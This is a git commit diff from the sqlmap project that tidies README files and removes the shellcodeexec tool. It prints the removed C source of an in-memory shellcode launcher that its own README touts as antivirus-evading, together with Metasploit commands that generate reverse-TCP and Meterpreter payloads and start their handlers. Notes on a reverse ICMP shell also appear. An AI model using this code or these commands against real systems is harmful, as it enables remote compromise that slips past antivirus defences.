cleanup to README files

2024-11-24 18:43:47 +03:00 · 2012-07-17 00:32:32 +01:00 · 2012-07-17 00:32:32 +01:00 · 224e6376a6
commit 224e6376a6
parent 7198e3185b
11 changed files with 12 additions and 448 deletions
--- a/extra/icmpsh/README.txt
+++ b/extra/icmpsh/README.txt
@ -8,14 +8,14 @@ icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible
 The master is straight forward to use. There are no extra libraries required for the C version. 
 The Perl master however has the following dependencies:
-	* IO::Socket
+    * IO::Socket
-	* NetPacket::IP
+    * NetPacket::IP
-	* NetPacket::ICMP
+    * NetPacket::ICMP
 When running the master, don't forget to disable ICMP replies by the OS. For example:
-	sysctl -w net.ipv4.icmp_echo_ignore_all=1
+    sysctl -w net.ipv4.icmp_echo_ignore_all=1
 If you miss doing that, you will receive information from the slave, but the slave is unlikely to receive
 commands send from the master.
@ -29,12 +29,12 @@ The slave comes with a few command line options as outlined below:
 -t host            host ip address to send ping requests to. This option is mandatory!
 -r                 send a single test icmp request containing the string "Test1234" and then quit. 
-		   This is for testing the connection.
+                   This is for testing the connection.
 -d milliseconds    delay between requests in milliseconds 
 -o milliseconds    timeout of responses in milliseconds. If a response has not received in time, 
-		   the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit.
+                   the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit.
                   The counter is set back to 0 if a response was received.
 -b num             limit of blanks (unanswered icmp requests before quitting
--- a/extra/runcmd/README.txt
+++ b/extra/runcmd/README.txt
@ -1,7 +1,3 @@
 Files in this folder can be used to compile auxiliary program that can
 be used for running command prompt commands skipping standard "cmd /c" way. 
-They are licensed under the terms of the GNU Lesser General Public License 
+They are licensed under the terms of the GNU Lesser General Public License.
 and it's compiled version is available on the official sqlmap subversion
 repository[1].
 [1] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/shell/runcmd.exe_
--- a/extra/shellcodeexec/README
+++ b/extra/shellcodeexec/README
@ -1,126 +0,0 @@
 = Short description =
 shellcodeexec is a small script to execute in memory a sequence of opcodes.
 = Background =
 Most of the shellcode launchers out there, including proof of concepts 
 part of many "security" books, detail how to allocate a memory page as
 readable/writable/executable on POSIX systems, copy over your shellcode
 and execute it. This works just fine. However, it is limited to POSIX,
 does not necessarily consider 64-bit architecture and Windows systems.
 = Description =
 This script and the relevant project files (Makefile and Visual Studio
 files) allow you to compile the tool once then run your shellcode across
 different architectures and operating systems.
 Moreover, it solves a common real world issue: the target system's anti
 virus software blocking a Metasploit-generated payload stager (either EXE
 of ELF). Take for instance the following command line:
    $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/shikata_ga_nai -o /tmp/payload.exe -t exe
 This generates a Metasploit payload stager, payload.exe, that as soon as
 it lands on the AV-protected target system is recognized as malicious and
 potentially blocked (depending on the on-access scan settings) by many
 anti virus products. At the time of writing this text, 21 out 41 anti
 viruses detect it as malicious - http://goo.gl/HTw7o. By encoding it
 multiple times with msfencode, less AV softwares detect it, still a lot.
 I have been surfing the Net and found some interesting tutorials and
 guides about packing, compressing, obfuscating and applying IDA-foo to
 portable executables et similar in order to narrow down the number of AV
 products that can detect it as a malicious file. This is all interesting,
 but does not stop few hard-to-die anti viruses to detect your backdoor.
 So the question is, how cool would it be to have a final solution to avoid
 all this hassle? This is exactly where this tool comes into play!
 = Features =
 shellcodeexec:
 * Can be compiled and works on POSIX (Linux/Unices) and Windows systems.
 * Can be compiled and works on 32-bit and 64-bit architectures.
 * As far as I know, no AV detect it as malicious.
 * Works in DEP/NX-enabled environments: it allocates the memory page where
  it stores the shellcode as +rwx - Readable Writable and eXecutable.
 * It supports alphanumeric encoded payloads: you can pipe your binary-encoded
  shellcode (generated for instance with Metasploit's msfpayload) to
  Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the
  BufferRegister variable to EAX registry where the address in memory of
  the shellcode will be stored, to avoid get_pc() binary stub to be
  prepended to the shellcode.
 * Spawns a new thread where the shellcode is executed in a structure
  exception handler (SEH) so that if you wrap shellcodeexec into your own
  executable, it avoids the whole process to crash in case of unexpected
  behaviours.
 = HowTo =
 1. Generate a Metasploit shellcode and encode it with the alphanumeric
   encoder. For example for a Linux target:
    $ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
   Or for a Windows target:
    $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
 2. Execute the Metasploit multi/handler listener on your machine. For
   example for a Linux target:
    $ msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
   Or for a Windows target:
    $ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
 3. Execute the alphanumeric-encoded shellcode with this tool. For example
   on the Linux target:
    $ ./shellcodeexec <msfencode's alphanumeric-encoded payload>
   Or, on the Windows target:
    C:\WINDOWS\Temp>shellcodeexec.exe <msfencode's alphanumeric-encoded payload>
 = License =
 This source code is free software; you can redistribute it and/or
 modify it under the terms of the GNU Lesser General Public
 License as published by the Free Software Foundation; either
 version 2.1 of the License, or (at your option) any later version.
 This library is distributed in the hope that it will be useful,
 but WITHOUT ANY WARRANTY; without even the implied warranty of
 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 Lesser General Public License for more details.
 You should have received a copy of the GNU Lesser General Public
 License along with this library; if not, write to the Free Software
 Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
 = Author =
 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 = Homepage =
 https://github.com/inquisb/shellcodeexec
--- a/extra/shellcodeexec/README.txt
+++ b/extra/shellcodeexec/README.txt
@ -0,0 +1,4 @@
 Binary files in this folder are data files used by sqlmap on the target
 system, but not executed on the system running sqlmap. They are licensed
 under the terms of the GNU Lesser General Public License and their source
 code is available on https://github.com/inquisb/shellcodeexec.
--- a/extra/shellcodeexec/linux/Makefile
+++ b/extra/shellcodeexec/linux/Makefile
@ -1,7 +0,0 @@
 32:
 	gcc -Wall -Os shellcodeexec.c -o shellcodeexec
 	strip -sx shellcodeexec
 64:
 	gcc -Wall -Os shellcodeexec.c -fPIC -o shellcodeexec
 	strip -sx shellcodeexec
--- a/extra/shellcodeexec/linux/shellcodeexec.c
+++ b/extra/shellcodeexec/linux/shellcodeexec.c
@ -1,138 +0,0 @@
 /*
 	shellcodeexec - Script to execute in memory a sequence of opcodes
 	Copyright (C) 2011  Bernardo Damele A. G.
 	web: http://bernardodamele.blogspot.com
 	email: bernardo.damele@gmail.com
 	This source code is free software; you can redistribute it and/or
 	modify it under the terms of the GNU Lesser General Public
 	License as published by the Free Software Foundation; either
 	version 2.1 of the License, or (at your option) any later version.
 	This library is distributed in the hope that it will be useful,
 	but WITHOUT ANY WARRANTY; without even the implied warranty of
 	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 	Lesser General Public License for more details.
 	You should have received a copy of the GNU Lesser General Public
 	License along with this library; if not, write to the Free Software
 	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
 */
 #include <sys/types.h>
 #include <stdio.h>
 #include <string.h>
 #include <stdlib.h>
 #include <time.h>
 #include <ctype.h>
 #if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
 #include <windows.h>
 DWORD WINAPI exec_payload(LPVOID lpParameter);
 #else
 #include <sys/mman.h>
 #include <sys/wait.h>
 #include <unistd.h>
 #endif
 int sys_bineval(char *argv);
 int main(int argc, char *argv[])
 {
 	if (argc < 2) {
 		printf("Run:\n\tshellcodeexec <alphanumeric-encoded shellcode>\n");
 		exit(-1);
 	}
 	sys_bineval(argv[1]);
 	exit(0);
 }
 int sys_bineval(char *argv)
 {
 	size_t len;
 #if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
 	int pID;
 	char *code;
 #else
 	int *addr;
 	size_t page_size;
 	pid_t pID;
 #endif
 	len = (size_t)strlen(argv);
 #if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
 	// allocate a +rwx memory page
 	code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 	// copy over the shellcode
 	strncpy(code, argv, len);
 	// execute it by ASM code defined in exec_payload function
 	WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
 #else
 	pID = fork();
 	if(pID<0)
 		return 1;
 	if(pID==0)
 	{
 		page_size = (size_t)sysconf(_SC_PAGESIZE)-1;	// get page size
 		page_size = (len+page_size) & ~(page_size);	// align to page boundary
 		// mmap an +rwx memory page
 		addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANON, 0, 0);
 		if (addr == MAP_FAILED)
 			return 1;
 		// copy over the shellcode
 		strncpy((char *)addr, argv, len);
 		// execute it
 		((void (*)(void))addr)();
 	}
 	if(pID>0)
 		waitpid(pID, 0, WNOHANG);
 #endif
 	return 0;
 }
 #if defined(_WIN64)
 void __exec_payload(LPVOID);
 DWORD WINAPI exec_payload(LPVOID lpParameter)
 {
 	__try
 	{
 		__exec_payload(lpParameter);
 	}
 	__except(EXCEPTION_EXECUTE_HANDLER)
 	{
 	}
 	return 0;
 }
 #elif defined(_WIN32) || defined(__WIN32__) || defined(WIN32)
 DWORD WINAPI exec_payload(LPVOID lpParameter)
 {
 	__try
 	{
 		__asm
 		{
 			mov eax, [lpParameter]
 			call eax
 		}
 	}
 	__except(EXCEPTION_EXECUTE_HANDLER)
 	{
 	}
 	return 0;
 }
 #endif
--- a/extra/shellcodeexec/windows/README
+++ b/extra/shellcodeexec/windows/README
@ -1,25 +0,0 @@
 Before compiling, an enviroment variable has to be set.
 --------------------------------------------------------------------------
 Variable name			Variable description
 --------------------------------------------------------------------------
 PLATFORM_SDK_DIR		Directory where the Platform SDK is installed
 Procedure for setting environment variables on Windows:
 My Computer -> Properties -> Advanced -> Environment Variables
 User variables -> New
 Sample value:
 --------------------------------------------------------------------------
 Variable name			Variable value
 --------------------------------------------------------------------------
 PLATFORM_SDK_DIR		C:\Program Files\Microsoft Platform SDK for Windows Server 2003 R2
 Notes:
 To get as small portable executable as possible compile as follows:
 * Use Visual C++ 2005
 * Strip the executable with UPX
--- a/extra/shellcodeexec/windows/shellcodeexec.sln
+++ b/extra/shellcodeexec/windows/shellcodeexec.sln
--- a/extra/shellcodeexec/windows/shellcodeexec/shellcodeexec.c
+++ b/extra/shellcodeexec/windows/shellcodeexec/shellcodeexec.c
@ -1,138 +0,0 @@
 /*
 	shellcodeexec - Script to execute in memory a sequence of opcodes
 	Copyright (C) 2011  Bernardo Damele A. G.
 	web: http://bernardodamele.blogspot.com
 	email: bernardo.damele@gmail.com
 	This source code is free software; you can redistribute it and/or
 	modify it under the terms of the GNU Lesser General Public
 	License as published by the Free Software Foundation; either
 	version 2.1 of the License, or (at your option) any later version.
 	This library is distributed in the hope that it will be useful,
 	but WITHOUT ANY WARRANTY; without even the implied warranty of
 	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 	Lesser General Public License for more details.
 	You should have received a copy of the GNU Lesser General Public
 	License along with this library; if not, write to the Free Software
 	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
 */
 #include <sys/types.h>
 #include <stdio.h>
 #include <string.h>
 #include <stdlib.h>
 #include <time.h>
 #include <ctype.h>
 #if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
 #include <windows.h>
 DWORD WINAPI exec_payload(LPVOID lpParameter);
 #else
 #include <sys/mman.h>
 #include <sys/wait.h>
 #include <unistd.h>
 #endif
 int sys_bineval(char *argv);
 int main(int argc, char *argv[])
 {
 	if (argc < 2) {
 		printf("Run:\n\tshellcodeexec <alphanumeric-encoded shellcode>\n");
 		exit(-1);
 	}
 	sys_bineval(argv[1]);
 	exit(0);
 }
 int sys_bineval(char *argv)
 {
 	size_t len;
 #if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
 	int pID;
 	char *code;
 #else
 	int *addr;
 	size_t page_size;
 	pid_t pID;
 #endif
 	len = (size_t)strlen(argv);
 #if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
 	// allocate a +rwx memory page
 	code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 	// copy over the shellcode
 	strncpy(code, argv, len);
 	// execute it by ASM code defined in exec_payload function
 	WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
 #else
 	pID = fork();
 	if(pID<0)
 		return 1;
 	if(pID==0)
 	{
 		page_size = (size_t)sysconf(_SC_PAGESIZE)-1;	// get page size
 		page_size = (len+page_size) & ~(page_size);	// align to page boundary
 		// mmap an +rwx memory page
 		addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANON, 0, 0);
 		if (addr == MAP_FAILED)
 			return 1;
 		// copy over the shellcode
 		strncpy((char *)addr, argv, len);
 		// execute it
 		((void (*)(void))addr)();
 	}
 	if(pID>0)
 		waitpid(pID, 0, WNOHANG);
 #endif
 	return 0;
 }
 #if defined(_WIN64)
 void __exec_payload(LPVOID);
 DWORD WINAPI exec_payload(LPVOID lpParameter)
 {
 	__try
 	{
 		__exec_payload(lpParameter);
 	}
 	__except(EXCEPTION_EXECUTE_HANDLER)
 	{
 	}
 	return 0;
 }
 #elif defined(_WIN32) || defined(__WIN32__) || defined(WIN32)
 DWORD WINAPI exec_payload(LPVOID lpParameter)
 {
 	__try
 	{
 		__asm
 		{
 			mov eax, [lpParameter]
 			call eax
 		}
 	}
 	__except(EXCEPTION_EXECUTE_HANDLER)
 	{
 	}
 	return 0;
 }
 #endif
--- a/extra/shellcodeexec/windows/shellcodeexec/shellcodeexec.vcproj
+++ b/extra/shellcodeexec/windows/shellcodeexec/shellcodeexec.vcproj
--- a/udf/README.txt
+++ b/udf/README.txt
@ -1,6 +1,4 @@
 Binary files in this folder are data files used by sqlmap on the target
 system, but not executed on the system running sqlmap. They are licensed
 under the terms of the GNU Lesser General Public License and their source
-code is available on the official sqlmap subversion repository[1].
+code is available on https://github.com/sqlmapproject/udfhack.
 [1] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/udfhack/